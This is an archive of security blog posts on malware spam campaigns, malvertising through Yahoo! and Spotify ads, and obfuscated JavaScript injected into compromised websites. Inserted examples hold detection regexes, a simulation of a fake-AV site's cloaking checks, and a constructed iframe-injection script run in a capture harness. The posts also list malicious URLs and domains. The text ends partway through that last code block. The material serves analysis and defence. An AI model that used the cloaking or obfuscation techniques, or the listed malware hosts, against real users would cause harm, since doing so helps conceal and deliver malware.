Tag Archive | "Malicious"

Malicious Spam on the increase again

Malware distribution via email is far from dead.  While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.


After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc., an online jewellery brand. People may well fall for this, especially since it claims a charge was made to their credit card. But look at the subject line, Successfull Order 3677718: the misspelling alone should flag this email as a scam.

Cutwail Spam Campaign

Another malicious spam campaign, this one originating from the Donbot botnet, arrived later this week. It uses a common, uncreative theme, with subject lines like “my hot pic : )” and “my naked pic is attached”. The Donbot botnet's spam output is on the rise, and this is the first time we have seen it spreading malicious attachments.

Donbot Spam Campaign

Both spam campaigns contain a zipped attachment which, once extracted, contains an executable file that downloads – surprise, surprise – Fake Antivirus:

In addition, this week we have been seeing more of the Asprox botnet's “Spam from your Facebook account” campaign, which preys on people's fears about the security of their Facebook accounts. This campaign first appeared last year; the bot herders behind Asprox cycle through a set of lures, including UPS, DHL, FEDEX and iTunes Gift Certificate themes, among others.

Recent Facebook spam campaign sent by Asprox

The attachment is a Trojan whose job is to seed the Asprox bot executable on the infected host, which is then used for spamming.

SMTP transaction of the Asprox process ASPIMGR.EXE

We have blogged about these types of threats many times before.  In a sense, it’s the same old stuff with slightly different social engineering. Be wary.

Posted in Security

Yahoo! PH Purple Hunt 2.0 Ad Compromised

The other day, I was browsing the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and surprisingly my browser downloaded a suspicious file named com.com.

Apparently this ad redirected me to a randomly generated URL similar to the following which, unfortunately, led to the malicious download:

  • hxxp://want6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/960b0a2a/com.com
  • hxxp://nose8.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/960b0a2a/com.com
  • hxxp://letter6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0f3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/785c08d8/com.com

Below is a screenshot of the file download dialog box:

The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

First, the download happens only once per browser, which suggests the malvertisement filters on IP address and User-Agent so that repeat visits do not trigger further downloads; repeated downloads would look suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.

It appears that the ad first redirects the browser to the malware download and only then to the real advertisement page. The download link follows this format:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.

Posted in Trendmicro

Facebook Events, Credits, and Passwords Being Used for Attacks

Facebook has expanded its range of service offerings, making the site so much more than a place where users can interact with one another. It has been said several times that Facebook is bound to replace email as a means of communication, as it provides a more convenient way for users to send messages.

This convenience, however, was also leveraged by cybercriminals in a recent spam run wherein users were urged to download an application called Facebook Messenger. This would supposedly make it easier for them to access messages sent to their Facebook accounts.

The attack starts with spammed messages that look like a Facebook notification. The email alerts users that a message has been sent to their Facebook account and tells them to click a link to view it. Clicking the link, however, displays a download page for an application called Facebook Messenger.


The downloaded file, named FacebookMessengerSetup.exe, is malicious and detected as BKDR_QUEJOB.EVL. BKDR_QUEJOB.EVL opens TCP port 1098 to listen for commands from a remote attacker. The commands can include updating the malicious file, downloading and executing other malicious files, and starting certain processes. It also queries the system for information such as installed antivirus products and OS version, and sends the gathered data to a certain SMTP server.

More Attacks Targeting Facebook Users

It seems like cybercriminals have their eyes particularly set on Facebook users these days, as this is not the only attack we’ve seen in the past couple of days.

In another spam run, recipients were told that their Facebook passwords were unsafe and that they should open an attached document containing their new passwords and information on how to further secure their accounts. Ironically, the document was actually malware, detected as TROJ_DOFOIL.VI.


We've also seen attacks similar to previously reported ones that exploit the Facebook Events feature. This time, however, the social engineering lure was yet another popular Facebook feature, Credits.

Users were notified of a supposed glitch in Facebook's system that could be fixed by following a set of instructions. As in the Facebook Stalker Tracker attack, users were told to copy a piece of code and paste it into their web browser. Executing the script creates an event and invites the affected user's contacts to it. The “event” contains spam such as links to the Canadian Pharmacy.


The script used to create the spam event is now detected as JS_OBFUS.PB.

Trend Micro product users are already protected from the above-mentioned threats through the Trend Micro™ Smart Protection Network™. Facebook users need to be aware that such schemes, among others, are rampant on the network. Extreme caution before clicking links is strongly advised. For more information, see our comprehensive report, Spam, Scams, and Other Social Media Threats.

Additional text and further analysis by Dhan Praga and Harry Reynoso

Posted in Trendmicro

Google Chrome: Protecting users from malicious downloads


Google has introduced a new feature for its Chrome browser that will display a warning if a user attempts to download a suspected malicious executable file.

The Chrome team are enhancing the implementation of their Safe Browsing API service to include downloaded files.

What is the Safe Browsing API?
The Safe Browsing API is an experimental API that enables client applications to check URLs against Google’s constantly updated blacklists of suspected phishing and malware pages. Your client application can use the API to download an encrypted table for local, client-side lookups of URLs that you would like to check.

The new feature will be integrated with Google Chrome and will display a warning if a user attempts to download a suspected malicious executable file:

This warning is displayed for any download URL that matches the current list of malicious websites published through the Safe Browsing API. Adding these known malware destinations should reduce infections among Chrome users. Note the limit of the approach: the check is on the download URL, not on the file itself, so a malicious executable served from a site not yet on the list draws no warning.

Posted in Quick Heal

Spotify application serves malicious ads

Today it was reported that Spotify, the popular streaming music service, displayed malicious ads to users of its Free version. The ads led to websites that used the Blackhole Exploit Kit to infect users with the Windows Recovery fake AV application. Our Advanced Classification Engine has full coverage for the Blackhole kit and protected users proactively. The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24.

 

Malvertising is nothing new; we've seen it affect large websites in the past, but this case is slightly different. In the past the malicious ads were displayed as part of a website and viewed in the browser. In this case the malicious ad is displayed inside the Spotify application, like in the picture below (note that the ad below is not malicious, it's just an example):

 

 

The application renders the ad code and runs it as if it were inside a browser. This means the Blackhole Exploit Kit works just fine, and it is enough for the ad to be displayed in Spotify to get infected; you do not even have to click on it. So if you had Spotify open but running in the background, listening to your favourite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all third-party ads from the free version while it investigated, but the ads have now been turned back on.

 

Once the ad was displayed, the computer would connect to hxxp://uev1.co.cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains:

 

 

Again, it was enough for the ad to be displayed in the Spotify application; the user did not have to click on it or do anything else. One of the vulnerabilities the exploit kit uses is in Adobe Reader/Acrobat: the kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file. Once the fake AV is launched, it connects to the following domains to download additional content, including a rootkit that is a packed version of TDSS:

 

  • tuartma.in
  • rappour.in
  • findstiff.org
  • searchcruel.org
  • findclear.org
  • replity.in
  • searchgrubby.org
  • demivee.in
  • ripplig.in

 

Here's a screenshot of what the application looks like on the user's PC:

 

 

One interesting thing is that we have only seen reports from infected users in the UK. This could mean that the attack only targets UK users or it's just that we haven't received reports from users anywhere else. If you are outside of the UK and have been affected by this, please send us a note using the comments feature below.

 

UPDATE: We got a tweet from our friends at Avast, who report this breakdown of users who have seen the malicious ad: Sweden 59%, UK 40% and other countries 1%. Thanks Avast, appreciate the info!

 

Thanks to Adam Hiscocks for providing information and samples to us.

Posted in Malware

Malicious Spam Campaign Preys on Japanese Disaster

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam vary, but sadly, many focus on the recent events in Japan.

 

The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string
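
As an added example (code written for this page, not taken from either post), here is a small triage script that covers both link shapes described on this page: the Cutwail pattern just shown and the malvertisement download format from the Yahoo! PH post above. The message body and the hostnames in it are constructed; the regexes are triage heuristics, not a verdict.

```javascript
// Added example; not code from the original posts. Pulls every href out of a
// raw HTML message body and flags links that fit the two shapes described on
// this page: the Cutwail "Twitter notification" link
// (http://lowercase_gibberish.(com|org|net)/base64string) and the Yahoo! PH
// malvertisement download (http://{word}{digit}.{domain}/se/{hex}/com.com).
// The sample message and hostnames below are constructed.

// Single base64-style token after the slash. "/" is left out of the character
// class on purpose so multi-segment paths such as /account/confirm never match.
// "Gibberish" cannot be judged by a regex; the host check is length + TLD only,
// so expect false positives on long legitimate hostnames and review by hand.
const CUTWAIL_LINK =
  /^https?:\/\/[a-z]{6,}\.(?:com|org|net)\/[A-Za-z0-9+]{16,}={0,2}$/;

// {word}{digit}.{domain}/se/{long hex blob}[/{8 hex}]/com.com, as observed in
// the malvertisement URLs (the second hex segment varied per visit).
const MALVERT_LINK =
  /^https?:\/\/[a-z]+\d\.[a-z0-9.-]+\/se\/[0-9a-f]{40,}(?:\/[0-9a-f]{8})?\/com\.com$/;

function classifyUrl(url) {
  if (CUTWAIL_LINK.test(url)) return 'cutwail-template';
  if (MALVERT_LINK.test(url)) return 'malvertisement';
  return null;
}

// Extract href values from raw HTML. A regex is enough for spam triage, where
// the markup is simple and we only need candidate links, not a DOM.
function extractHrefs(html) {
  const out = [];
  const re = /href\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

function triageHtml(html) {
  return extractHrefs(html)
    .map((url) => ({ url, label: classifyUrl(url) }))
    .filter((r) => r.label !== null);
}

// Constructed sample message body (not a real campaign capture).
const SAMPLE_MESSAGE = `
<p>You have 2 direct messages on Twitter.</p>
<a href="https://twitter.com/account/confirm">View your account</a><br>
<a href="http://qwzrtplk.net/aGVscCBtZSBwbGVhc2U=">Read messages</a><br>
<a href='http://want6.example.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/960b0a2a/com.com'>ad</a>
<a href="http://example.org/about">About</a>
`;

console.log(triageHtml(SAMPLE_MESSAGE));
```

Run over the constructed message, the two flagged links are the base64-path link and the /se/…/com.com download; the Twitter account link and the short /about path pass untouched. Treat hits as candidates for the sandbox, not as blocking rules.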

The links lead to a page hosting obfuscated malicious JavaScript that seeks to exploit a Java vulnerability. Our host was immediately compromised and botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed, complete with scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers.  As ever, remain on guard, especially when it comes to Twitter ‘notifications’.

Posted in Security

BSNL, Bangalore website yet another victim of malicious code injection

BSNL, Bangalore telecom district has become yet another victim of poor website security and has been infected with malicious JavaScript code. This time, the code points to a malicious domain used by the well-known Gumblar botnet. Recently, my colleague Pradeep blogged about two Indian websites, ICWAI and KVGBANK, that were also infected with malicious content. The “http://www.bangaloretelecom.com” site provides information on telecommunications services offered, telephone number search, online payment of bills, etc. This is yet another example of a popular website in India which has been compromised. Here is the screenshot of the home page:

Interestingly, the home page itself does not contain malicious content; the malicious JavaScript has been injected into one of the “.js” files used for searching the website's content. If you look at the above screenshot, you will see a small search box. The attack is triggered by searching for anything using this functionality. Below is a screenshot of the search page a user is redirected to:

The source code of this page contains various “.js” files. The “search.js” file is infected with malicious JavaScript code. Here is the source code of that file:

The malicious JavaScript code is inserted at the bottom of this “.js” file. Here is the malicious content:

There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to same malicious domain. Let’s investigate one of them:

The decoded script is shown below:

The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, the malicious domain has now been taken down.

Zscaler blocks the infected page (http://bangaloretelecom.com/search.js) rather than the whole website. This example illustrates how malicious content can be filtered out while still allowing access to an otherwise legitimate site, an important approach given the prevalence of such infections. Our recent posts highlight that numerous popular Indian websites are struggling with proper application security controls.

Umesh

Posted in Security

How To Speak Malicious

In this blog post, I want to cover a specific type of code obfuscation and then demonstrate how to manually, step-by-step deobfuscate the code. There are many automated tools and methods for performing deobfuscation, but I feel it's important to get down to the attacker's level to gain a more intimate understanding of attackers and obfuscation algorithms. This understanding helps us create better signatures to identify malicious content with our Threatseeker Network. After all, the best way to protect yourself and others from attack is to understand your attacker so that you have a better chance at proactive protection. Now, on to an example of obfuscated attack code. 

It's important to note that sites that have this code are most likely legitimate sites that have fallen prey to malicious code injection. This means that the site has been compromised by an attacker. The attacker inserts malicious code onto the compromised site and the injected malicious code executes when visitors visit the site. The attack code can either be on the compromised site or on another site to which the injected code redirects the visitor. We can think of the injected site as a vehicle for getting the attack code to run on victim computers. Below is a screenshot of the injected code that we're going to study. 

Injected code on an innocent site: 

For most people who see this malicious code, their eyes go crossed and they have no idea what they are looking at. This is the attacker's intent. Attackers don't want anybody viewing the source of the page to recognize that their injected code is doing something bad. So our first step is to format this script code so that it's easier for our eyes and brains to handle. You'll want to grab the code, put it into your favorite text editor and format it so that it looks like actual code. When that's done, you should feel that the code is easier to read and much less intimidating to review. 

Here is the code copied from the source of the page and formatted: 

Now that the code is nicely formatted, we can see that there are a number of function definitions in the script. In each of the function definitions we can see a variable declared with a peculiar string of numbers in a specific pattern. We can also see that this variable seems to be followed by a for loop. The for loop attracts my eyes straight away. Typically, a for loop that follows a peculiar variable definition is a red flag for a deobfuscation routine. For the rest of this post, we'll focus on one of the function definitions. 

Here is the function definition we are going to work with: 

Looking at this function, there is further work we can do to make things easier for our eyes and brains. First, notice that the variable names are random and not meaningful. This, again, is designed to throw us off from understanding what is going on. But we are tenacious and not about to give up. So the next thing to do is review the variable names, including where and how they are used. If a variable holds the same value throughout, do a simple search and replace of the variable name with its value. In this case, we can replace every use of CcySlu with 4 and every use of vcN with 5.

We should also look for any places where function declarations are used in a similar way. For example function XKJepVPIJ(c) is simply returning the string representation for a character code that is passed in. So anywhere we see a call to XKJepVPIJ, we can replace it with String.fromCharCode. Finally, in this step let's perform any mathematical operations in the function, so that we are left with a single number instead of a series of numbers and operations that we would have to think about every time we come across them in a loop. 

Here's a look at the function after performing the above steps: 

This function still looks intimidating, but less so, because we can now recognize that the for loop runs backwards instead of from 0 to the end of a string or array. This is probably another ploy to throw off static analysis. We also have static values to work with instead of randomized variable names, so the simple math operations and simple function calls stand out. With respect to function calls, I'm no JavaScript developer, so I don't recognize every JavaScript function I come across. In this case, I was unfamiliar with the parseInt function, and that threw me for a bit of a curve at first.

So I pulled out my local library card and hopped on my bike to do some research. Actually, that was a middle school flashback; I'm showing my age here! I simply did a Google search for the parseInt function to learn what it does. parseInt converts a string to an integer: it reads digits from the start of the string and stops at the first character that is not a digit (so parseInt("122-2") is 122), and its optional second argument is the radix, which defaults to 10 for strings like these. Removing the calls is only safe when each one is applied to a value that is already a plain number, which is the case here, as the decoded result shows; applied to a string such as "122-2", the truncation would matter and the call would have to stay. With parseInt removed, we can rename some of the random variable names to friendlier ones and we're left with readable code to step through.

This is the final resulting code. It's much easier to get my head around. I've also put a few comments inline: 

For those of you wishing to try and step through this: 

var string='122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+164-0+120-4+112-0+112-0+165-3+';

Now that this first function has been decoded, remember that there were multiple function definitions in this script injection. You should begin to see a script redirection created by the injected code. This script redirects visitors to an attack site while they are visiting the original site, which was injected with the above obfuscated code. As you can see, there was a lot of work done to hide the intent of the injected code. This obfuscation work is an attempt to evade recognition and removal of the injected code from a legitimate site. By understanding the deobfuscation process, we can generate more generic signatures that will help identify variations of this script injection. 

Security Researcher: Chris Astacio


Posted in Antivirus

BBC – 6 Music and 1xtra Web site Injected With Malicious iFrame

The BBC – 6 Music Web site has been injected with a malicious iframe, as have areas of the BBC 1Xtra radio station Web site.  At the time of writing this blog, the sites are still linking to an injected iframe.

Websense customers are protected with our Advanced Classification Engine analytics, our suite of technologies within TRITON.


Posted in Security

Researching Malicious Websites: A Few Tips

Malicious websites often aim to only attack end-users of computer systems, without revealing inner-workings to security researchers. Mike Wood, Threat Researcher at Sophos, described the defensive practices used by websites that distribute fake anti-virus tools. (Strangely, the article is no longer available on the Sophos website, though it is in their RSS feed.)

Mike Wood pointed out that malicious sites often perform the following checks before deciding to attack the visitor:

  • Review the User-Agent header of the browser, only attacking certain browsers.
  • Review the Referer header, only attacking victims who come from certain websites, most notably from Google.
  • Use JavaScript to compute the destination of the redirection, hoping to fool some of the simpler crawlers or website mirroring tools
  • Use a “nonce to only return the attack payload if the link is fetched immediately after being generated”
  • Track the visitor's IP address, not attacking if the IP is on a “blacklist” or if it has already been attacked recently

There are other self-defensive measures as well… I recommend reading Mike Wood's article for additional details on these tactics and for his recommendations on how web surfers can turn them to their advantage. (If the article reappears on the Sophos website.)

If you are a security researcher, here are some of the techniques that can help you bypass the self-defensive measures outlined above:

  • Fake your browser's headers to match the values the malicious website expects. I showed the importance of this in an earlier article and also demonstrated how to do it with the wget and curl tools.
  • Consider using a full browser, rather than a command-line tool, and let your laboratory system be infected. I like capturing the infection into a PCAP file using a network sniffer and then examining the file with Jsunpack-n.
  • When navigating a malicious website using a browser, send your traffic through a local proxy, such as Paros Proxy or Fiddler, so that you have full visibility into the traffic exchanged between the browser and the website.
  • Consider using a honey client that can execute JavaScript, rather than merely running wget or curl commands. Jsunpack-n can do this. Recently-released PhoneyC seems to have this ability too, though I haven’t tried it yet.
  • Proxy your traffic to conceal its origin. Tor is a common option for this; however, Mike Wood pointed out that attackers sometimes cloak their sites from such traffic. Having your own network of proxy servers that keep changing is hard, but may be useful for a large security research operation.
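
As an added illustration (code written for this page, not from Mike Wood's or Lenny Zeltser's articles), here is the gate from the first list above modelled as a single function, with the countermeasures from the second list run against it. It also reproduces the once-per-visitor behaviour noted in the Yahoo! PH malvertisement post, where changing the User-Agent got the download served again. The thresholds, the target-browser rule, the blocked IP ranges and every request below are constructed assumptions.

```javascript
// Added example; not code from the articles above. Models the self-defensive
// checks of a fake-AV landing page as one decision function, then walks a
// researcher's attempts against it. All values are constructed assumptions.

const NONCE_WINDOW_MS = 60 * 1000;            // assumed: link must be used within a minute
const REPEAT_COOLDOWN_MS = 24 * 3600 * 1000;  // assumed: one payload per visitor per day

// Assumed "blacklist": TEST-NET-2 standing in for Tor exits / known scanners,
// plus a lab range.
const BLOCKED_PREFIXES = ['192.0.2.', '10.66.'];

function makeGate(now = () => Date.now()) {
  const nonces = new Map();  // nonce -> time the link was generated
  const served = new Map();  // "ip|user-agent" -> time the payload was served
  let counter = 0;

  // Called when the site builds the link it hands out (e.g. in a poisoned search result).
  function issueLink() {
    const nonce = 'n' + (++counter).toString(36) + now().toString(36);
    nonces.set(nonce, now());
    return nonce;
  }

  // Exploit page or decoy? Checks run in the order the article lists them.
  function decide(req) {
    const t = now();
    const ua = req.ua || '';
    if (BLOCKED_PREFIXES.some((p) => req.ip.startsWith(p))) return { serve: false, reason: 'ip-blacklisted' };
    // Keyed on IP + User-Agent: the behaviour seen in the Yahoo! PH case,
    // where a new User-Agent from the same machine got the download again.
    const key = req.ip + '|' + ua;
    const last = served.get(key);
    if (last !== undefined && t - last < REPEAT_COOLDOWN_MS) return { serve: false, reason: 'already-served' };
    if (!/Windows NT/.test(ua) || !/(MSIE|Firefox)/.test(ua)) return { serve: false, reason: 'user-agent' };
    if (!/^https?:\/\/(www\.)?google\./.test(req.referer || '')) return { serve: false, reason: 'referer' };
    const issued = nonces.get(req.nonce);
    if (issued === undefined) return { serve: false, reason: 'nonce-unknown' };
    if (t - issued > NONCE_WINDOW_MS) return { serve: false, reason: 'nonce-stale' };
    nonces.delete(req.nonce);  // single use
    served.set(key, t);
    return { serve: true, reason: 'ok' };
  }

  return { issueLink, decide };
}

// Walk-through with a fake clock so the run is deterministic.
function demo() {
  let clock = 1300000000000;
  const gate = makeGate(() => clock);
  const ip = '203.0.113.7';  // TEST-NET-3: the analyst's lab host
  const ie = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)';
  const ff = 'Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0';
  const fromGoogle = 'http://www.google.com/search?q=free+antivirus';
  const reasons = [];

  let nonce = gate.issueLink();
  clock += 500;
  // 1. Plain wget: wrong User-Agent, no Referer -> decoy page.
  reasons.push(gate.decide({ ip, ua: 'Wget/1.12 (linux-gnu)', referer: '', nonce }).reason);
  // 2. Same link with spoofed headers -> exploit page, served once.
  reasons.push(gate.decide({ ip, ua: ie, referer: fromGoogle, nonce }).reason);
  // 3. Replay of the same link from the same browser -> refused.
  reasons.push(gate.decide({ ip, ua: ie, referer: fromGoogle, nonce }).reason);
  // 4. A fresh link, same IP and User-Agent -> still refused (visitor is "done").
  nonce = gate.issueLink();
  reasons.push(gate.decide({ ip, ua: ie, referer: fromGoogle, nonce }).reason);
  // 5. Same fresh link, different User-Agent (the spoofing-extension trick) -> served again.
  reasons.push(gate.decide({ ip, ua: ff, referer: fromGoogle, nonce }).reason);
  // 6. A link fetched too late, e.g. from a crawler queue -> nonce expired.
  nonce = gate.issueLink();
  clock += NONCE_WINDOW_MS + 1;
  reasons.push(gate.decide({ ip: '203.0.113.8', ua: ff, referer: fromGoogle, nonce }).reason);
  // 7. A blocked source range -> refused before anything else is looked at.
  reasons.push(gate.decide({ ip: '192.0.2.9', ua: ff, referer: fromGoogle, nonce: gate.issueLink() }).reason);
  return reasons;
}

console.log(demo());
```

The walk-through produces user-agent, ok, already-served, already-served, ok, nonce-stale, ip-blacklisted. The practical lessons match the lists above: a default wget fetch gets the decoy; the first successful fetch is the only one you get from that browser identity, so capture it (PCAP or proxy) rather than planning to fetch twice; queued or delayed fetches miss the nonce window; and a source the site already distrusts, such as a Tor exit, never sees the payload at all.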

If you’re just starting to learn how to research malicious websites, you might like my list of free online tools for looking up potentially malicious websites. Just keep in mind that these tools might be affected by the self-defensive properties of the sites they investigate.

Lenny Zeltser

Posted in Security

KVGBANK Affected with Malicious JavaScript


Karnataka Vikas Grameena Bank is the victim of an attack. The site has been compromised by the injection of malicious obfuscated JavaScript.

Home page of kvgbank.com :

Obfuscated JavaScript :

Multilevel obfuscated JavaScript was used to infect the site; it took two levels of de-obfuscation to fully decode it.

Part of De-obfuscated JavaScript:

The purpose of such attacks is to redirect the victim's browser to pull content from a malicious site. Attackers have learned that it is far more effective to infect already popular websites than to set up a separate malicious site and social-engineer victims into visiting it. In this particular instance, the de-obfuscated code opens a pop-up box depending on the user's browser version. The link used now points to a parked domain but likely hosted malicious code previously.

Home Page of http://dldslauno.com/ld/ment/ :


Even though the malicious code is no longer delivered by the above site, the vulnerability that led to the attack may not yet have been patched, so further infection could occur, or the linked site may host malicious content again in future. We have informed the bank about the infection.

VirusTotal results show that 23 of 43 AV vendors flag the KVG Bank site.

Pradeep.

Posted in Security

In depth analysis – decoding HTML Style tag based malicious Iframes

Injecting clear text or obfuscated malicious Iframes has become a common attack vector. By taking advantage of known/unknown vulnerabilities in web servers or applications, an attacker can inject a malicious Iframe which will point to a malicious domain hosting malware. Attackers continually modify the way they inject malicious Iframes, leveraging various encoding techniques, to hide their malicious code from security products. They also do this to add complexity for security researchers trying to decode the attacks in the first place. Recently, we came across another malicious Iframe attack which was carried out with the help of HTML style tags. Here is the screenshot of an attack found on an infected website:

Attackers have been able to insert a malicious style tag and malicious JavaScript code at the bottom of the page, in two separate locations. Using some JavaScript together with DOM objects and properties, the attacker has injected obfuscated malicious code that is difficult to decode with tools like Malzilla or online services like jsunpack.org. This blog will explain how to decode such hidden malicious Iframes by properly reading the code step by step. Let's start by formatting the code.

The above code contains one style rule, with the selector “#c19”. On further inspection, we see that variable “WnmaQ” is defined with function “YYSXc()”. After that, three other variables are defined, two of them containing garbage or useless functions, and then there is a call to the original function via “Wnmaq.YYSXc()”. So this code calls the function inside the first defined variable. Now let's format that function and break the code into parts so we can decode it step by step. Here is the first part of the script:


Looking at the code above, we can see some garbage or useless variables and functions declared for no purpose, such as variables “l” and “v” and function “nB()”. There are many such garbage variables and functions throughout the script; they are never used for anything significant, so we will skip them and concentrate only on the variables, code and functions that matter for decoding this malicious JavaScript. Variable “g” is assigned a new Date() object, which exposes the current date through methods such as getFullYear() and getMonth(). Variable “o” is assigned “g.getMonth()”, the zero-based month of the current date; at the time of this analysis that was 10, i.e. November. Variable “r” is then built as the string “from10e”, and the 10 in it is replaced by the string “CharCod”, leaving an interesting string in variable “r”: “fromCharCode”. Note that this only works in November; in any other month the replace finds no “10”, the script later looks up a non-existent method such as “from3e” on String and fails, so the date must be pinned when replaying the sample. Variable “i” is assigned the object “document.styleSheets”, which returns the list of style sheets. Let's decode the second part of the main script:

The above “for()” loop extracts the array data from the style tag defined earlier. I have put some comments inside the image to better explain the components of the code. First, variable “q” is compared against each style sheet rule via the “.selectorText” property. When the loop finds the rule with selector “#c19”, the code continues. The next variable, “w”, retrieves the array from that rule via the “.style.backgroundImage” property. Now we finally have useful variables. At this point we should test that everything seems reasonable. Let's create a simple “test.html” file containing only the important variables, the style tag and this code, and check what variable “w” holds after the above code runs, using an “alert()”. The sample HTML file is shown below:

We have removed everything and added only those variables which we decoded earlier. We should get array values from style tag. Here is what the variable “w” will contain after running above file.

So, the second part of the script just retrieved values from style tag. This shows our analysis is on the right track. We will keep this “test.html” file as it is and will add more interesting code after additional analysis. Let’s look into next part of the main script:

The above code shows that variable “c” holds the string “split” and variable “m” holds the array values separated by commas. Variable “k” holds the array length divided by 2. We add these three lines to our “test.html” file and alert the value of “k”: it is 90 if you run the modified “test.html”. The above code also contains garbage code, as mentioned earlier. Let's decode the last part of the main script:

The above code is the last part of the main malicious script. Here we finish decoding and get to the main malicious code behind it. As analysed earlier, variable “k” holds 90, so this “for()” loop runs 90 times. The “parseInt()” function is used to obtain the exact integer. Variable “o” holds the month from the date object, which is 10, and variable “r” holds the string “fromCharCode”, as found earlier. So finally variable “j” will look like,

j += String["fromCharCode"][rZ];

The loop continues and variable “j” is appended with the characters produced by the above expression. This is the main code behind the entire script. The last variable, “kW”, contains the JavaScript function “eval()”, and then there is a call to this function with parameter “j”. This tells us that the malicious content will evaluate the code inside variable “j”. Let’s add this “for()” loop to our earlier “test.html” file and alert the value of “j” to find out the hidden code. This is what our final “test.html” code will look like:

We have only added the useful variables, loops and JavaScript code to the above file, and removed the useless variables and functions from the main script. Here is what you see when you run the above file:

The malicious iframe pointing to a malicious domain is finally revealed. The attacker created the malicious JavaScript code with the help of a style tag to generate a malicious iframe. This process can be difficult to analyze, and tools or services may fail due to the complex nature of the code and the various tricks used by the attacker. However, with a little patience and good eyes, it is quite easy to decode such malicious JavaScript by understanding the flow of the code. That’s it for now.
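The same “swap eval for alert” idea in a form that runs offline under Node.js, as an added example that is not part of Umesh's post. Instead of alert(), the harness shadows eval (together with alert, document and window) with function parameters, so whatever string the script hands to eval is recorded and never executed. The obfuscated script, the fake document with its #c19 rule and the two-numbers-per-character encoding are all constructed for this example; the real script's exact encoding is not visible on the page, only its shape (style rule, split on commas, k = length/2, parseInt, fromCharCode, eval).

```javascript
// Added example (not from the original post). The obfuscated script below is
// CONSTRUCTED: it mirrors the structure the article describes (payload hidden
// in a CSS rule's background-image, split on commas, rebuilt with
// parseInt/fromCharCode, passed to eval) but uses an encoding of my own.
const OBFUSCATED_SCRIPT = `
var q, w;
for (var i = 0; i < document.styleSheets[0].cssRules.length; i++) {
  q = document.styleSheets[0].cssRules[i];
  if (q.selectorText == "#c19") { w = q.style.backgroundImage; }
}
var c = "split", m = w[c](","), k = m.length / 2, j = "", r = "fromCharCode";
for (var z = 0; z < k; z++) {
  j += String[r](parseInt(m[2 * z], 10) - parseInt(m[2 * z + 1], 10));
}
var kW = eval;
kW(j);
`;

// Constructed encoding: each character becomes two comma-separated numbers,
// (charCode + offset, offset), so the script rebuilds k = m.length / 2 chars.
function encodePayload(text) {
  const parts = [];
  for (let i = 0; i < text.length; i++) {
    const offset = (i % 7) + 3; // arbitrary but deterministic
    parts.push(String(text.charCodeAt(i) + offset), String(offset));
  }
  return parts.join(",");
}

// Minimal stand-in for the DOM: just enough style-sheet structure for the
// script's selectorText / style.backgroundImage lookups. document.write
// throws so that any leak into real execution is caught immediately.
function fakeDocument(encoded) {
  return {
    styleSheets: [{ cssRules: [
      { selectorText: "body", style: { backgroundImage: "none" } },
      { selectorText: "#c19", style: { backgroundImage: encoded } },
    ] }],
    write() { throw new Error("payload executed instead of being captured"); },
  };
}

// Run the script with eval/alert/document/window shadowed by parameters.
// A parameter named `eval` is legal in sloppy-mode code, which a `new
// Function` body is unless it opts into strict mode itself.
function captureEval(script, doc) {
  const captured = [];
  const record = (code) => { captured.push(String(code)); };
  const runner = new Function("eval", "alert", "document", "window", script);
  runner(record, record, doc, {});
  return captured;
}

// Demo: hide a placeholder iframe-injecting string (constructed, .invalid TLD)
// in the style rule and recover it without executing it.
function demo() {
  const payload = `document.write('<iframe src="http://PLACEHOLDER.invalid/" width=1 height=1></iframe>')`;
  return captureEval(OBFUSCATED_SCRIPT, fakeDocument(encodePayload(payload)));
}

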